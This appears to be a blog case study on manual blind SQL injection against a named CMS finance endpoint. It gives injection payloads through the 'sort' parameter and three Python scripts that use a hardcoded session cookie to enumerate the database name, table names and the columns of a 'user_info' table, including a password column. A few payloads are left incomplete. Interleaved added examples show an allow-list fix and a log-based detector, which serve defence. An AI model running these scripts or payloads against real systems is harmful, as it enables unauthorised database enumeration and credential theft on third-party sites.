Case study: Python-assisted manual SQL injection to enumerate a database - LMLPHP

An SQL injection vulnerability was found.

The simple route is to dump the database directly with the sqlmap tool.

But if you want to understand how SQL injection works in depth, you can try manual injection, with a Python script to do the repetitive guessing for you.

First, open HackBar.


Get the session ID value after logging in to the CMS.


Start building the SQL payload.

Get the length of the database name:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (length(database())=8) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc


Manual guessing has to iterate from 1 upward; when the value reaches 8, the guess succeeds (the response changes).
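The probe above only works because the `sort` (and `order`) parameters are assembled into the ORDER BY clause as-is. As an added example, not code from the original post, here is that vulnerable concatenation beside an allow-list builder that refuses the post's payload; the column set, the function names and the `INJECTED_SORT` constant are assumptions.

```python
# Hypothetical allow-list of sortable columns for this endpoint; the real
# application's column set is not given on the page.
ALLOWED_SORT_COLUMNS = {"CREATE_DATE", "ACCOUNT_NAME", "BALANCE"}
ALLOWED_DIRECTIONS = {"asc", "desc"}

# Payload shape from the post, injected through the `sort` parameter.
INJECTED_SORT = ("CREATE_DATE,(SELECT (CASE WHEN (length(database())=8) THEN 9441 "
                 "ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))")


def build_order_by_unsafe(sort, order):
    """The vulnerable pattern: request parameters pasted straight into SQL."""
    return "ORDER BY %s %s" % (sort, order)


def build_order_by(sort, order):
    """Hardened version: each requested column must be on the allow-list and
    the direction must be one of two literals; anything else raises."""
    columns = [c.strip() for c in sort.split(",")]
    for col in columns:
        if col not in ALLOWED_SORT_COLUMNS:
            raise ValueError("sort column not allowed: %r" % col)
    direction = order.strip().lower()
    if direction not in ALLOWED_DIRECTIONS:
        raise ValueError("order must be asc or desc")
    return "ORDER BY " + ", ".join(columns) + " " + direction.upper()


def is_rejected(sort, order):
    """True when the hardened builder refuses the input (handy for tests)."""
    try:
        build_order_by(sort, order)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    print(build_order_by_unsafe(INJECTED_SORT, "desc"))  # the CASE WHEN reaches the DB
    print(is_rejected(INJECTED_SORT, "desc"))            # True
    print(build_order_by("CREATE_DATE, BALANCE", "asc"))
```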


The tedious part of manual SQL injection is this guessing process: a large amount of repetitive work, which is why it is worth automating in Python.

The script is as follows:

```python
# -*- coding: utf-8 -*-
# user()
# database()
import requests

cookies = {
    'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
}
url = 'http://yucms.hhlyty.cn/finance/account/accountList'
# Response length observed for a true condition; the value in the original
# post was lost in extraction, so fill it in from a known-true request.
TRUE_LENGTH = 0
# Upper bound for the loop; the original bound was lost in extraction.
MAX_LEN = 30
string = ''
for i in range(1, MAX_LEN + 1):
    # length of the database name
    body = {'page': '1', 'rows': '15', 'order': 'desc',
            'sort': 'CREATE_DATE,(SELECT (CASE WHEN (length(database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}
    # number of tables in the database
    # body = {'page': '1', 'rows': '15', 'order': 'desc',
    #         'sort': '(SELECT (CASE WHEN ((select count(*) from information_schema.tables where table_schema =database())={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}
    rs = requests.request("POST", url, cookies=cookies, params=body)
    content = rs.content
    length = len(content)
    # print(length)
    if length == TRUE_LENGTH:
        print("database name length is: %d" % i)
        print(rs.text)
```


Guess the full database name

Payload:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN (substr(database(),1,1)=char(71)) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))&order=desc

In substr(database(),1,1), the first 1 is the position within the string and the second 1 is the number of characters taken, so the name can be guessed one character at a time.

```python
# -*- coding: utf-8 -*-
import requests

cookies = {
    'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
}
url = 'http://yucms.hhlyty.cn/finance/account/accountList'
# Response length observed for a true condition; the value in the original
# post was lost in extraction, so fill it in from a known-true request.
TRUE_LENGTH = 0
DB_NAME_LEN = 8  # found by the previous script
# dic1 = '3_abcdefghijklmnopqrstuvwxyz'
dic = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789_^~]}\\|[{?>=<;:/.-,+*)('&%$#@!"
print(len(dic))
string = ''
for i in range(1, DB_NAME_LEN + 1):
    for j in dic:
        # compare the i-th character of database() with the candidate's ASCII code
        body = {'page': '1', 'rows': '15', 'order': 'desc',
                'sort': '(SELECT (CASE WHEN (substr(database(),{0},1)=char({1})) THEN 1 ELSE 2302*(SELECT 2302 FROM INFORMATION_SCHEMA.TABLES) END))'.format(i, ord(j))}
        rs = requests.request("POST", url, cookies=cookies, params=body)
        content = rs.content
        length = len(content)
        print(body)
        if length == TRUE_LENGTH:
            print("character %d of the database name is: %s" % (i, j))
            string += j
            break
print("the database is: %s" % string)
```


Guessing table names:

1. Guess the length of the 204th table's name:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)=9) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc


```python
# -*- coding: utf-8 -*-
# user()
# database()
import requests

cookies = {
    'SESSION': 'dacee233-9fc0-442b-8948-8c276005d7c2'
}
url = 'http://yucms.hhlyty.cn/finance/account/accountList'
# Response length observed for a true condition; the value in the original
# post was lost in extraction, so fill it in from a known-true request.
TRUE_LENGTH = 0
# Upper bound for the loop; the original bound was lost in extraction.
MAX_LEN = 30
string = ''
for i in range(1, MAX_LEN + 1):
    # length of the name of the 204th table in the database
    body = {'page': '1', 'rows': '15', 'order': 'desc',
            'sort': '(SELECT (CASE WHEN ((select length(table_name) from information_schema.tables where table_schema=database() limit 204,1)={0}) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))'.format(i)}
    rs = requests.request("POST", url, cookies=cookies, params=body)
    content = rs.content
    length = len(content)
    # print(length)
    if length == TRUE_LENGTH:
        print("length of the 204th table's name is: %d" % i)
        print(rs.text)
```


page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(table_name,1,1) from information_schema.tables where table_schema=database() limit 204,1)))=117) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

1 is the first character of the table name

204 is the 204th table in the database

117 is the ASCII code of the first character


Guessing column names:

1. First guess the number of columns in the table

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select count(*) from information_schema.columns where table_schema=database() and table_name='user_info')=) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc


2. Guess the columns one by one:

Guess the password column:

Guess the length of the first column of the 204th table, user_info:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select length(column_name) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)=) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

Guess the length of the first column name:


Guess the column name:

page=1&rows=15&sort=CREATE_DATE,(SELECT (CASE WHEN ((select ascii((select substr(column_name,1,1) from information_schema.columns where table_schema=database() and table_name='user_info' limit 1,1)))=85) THEN 9441 ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&order=desc

The first character of the column name is found to be ASCII 85.
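From the defender's side, every step of this enumeration leaves the same fingerprint in the access log: a burst of requests from one client whose `sort` parameter carries CASE WHEN and information_schema, with only a number changing between requests. As an added example, not from the original post, here is a Python parser run over constructed log lines in that shape; the log format, client addresses and function names are assumptions.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs, quote

# Constructed sample access-log lines (not real traffic). One client runs the
# post's length-probing loop; another sends a legitimate sort request.
def _line(client, sort):
    qs = "page=1&rows=15&order=desc&sort=" + quote(sort, safe="")
    return ('%s - - [28/Apr 13:41:00] "POST /finance/account/accountList?%s '
            'HTTP/1.1" 200 3120' % (client, qs))

PROBE = ("CREATE_DATE,(SELECT (CASE WHEN (length(database())=%d) THEN 9441 "
         "ELSE 9441*(SELECT 9441 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))")
LOG_LINES = [_line("10.0.0.5", PROBE % n) for n in range(1, 9)]
LOG_LINES.append(_line("10.0.0.9", "CREATE_DATE"))

# Markers the post's payloads share: conditional branching plus schema probing.
SIGNATURE = re.compile(r"case\s+when|information_schema|database\(\)|substr\(|ascii\(", re.I)
LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "(\S+) (\S+) [^"]*" (\d{3}) (\d+)')


def parse_line(line):
    """Split one combined-log style line into client, path, decoded params, size."""
    m = LINE_RE.match(line)
    if not m:
        return None
    client, method, target, status, size = m.groups()
    parts = urlsplit(target)
    params = {k: v[0] for k, v in parse_qs(parts.query, keep_blank_values=True).items()}
    return {"client": client, "method": method, "path": parts.path,
            "params": params, "status": int(status), "size": int(size)}


def suspicious_params(entry):
    """Names of parameters whose decoded value matches the injection signature."""
    return [k for k, v in entry["params"].items() if SIGNATURE.search(v)]


def analyse(lines):
    """Count flagged requests per client: a run of hits with only a number
    changing between them is the enumeration loop the post automates."""
    hits = Counter()
    for line in lines:
        entry = parse_line(line)
        if entry and suspicious_params(entry):
            hits[entry["client"]] += 1
    return hits
```

Running `analyse(LOG_LINES)` attributes all eight probes to 10.0.0.5 and nothing to the legitimate client, which is the per-client count worth alerting on.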


04-28 13:41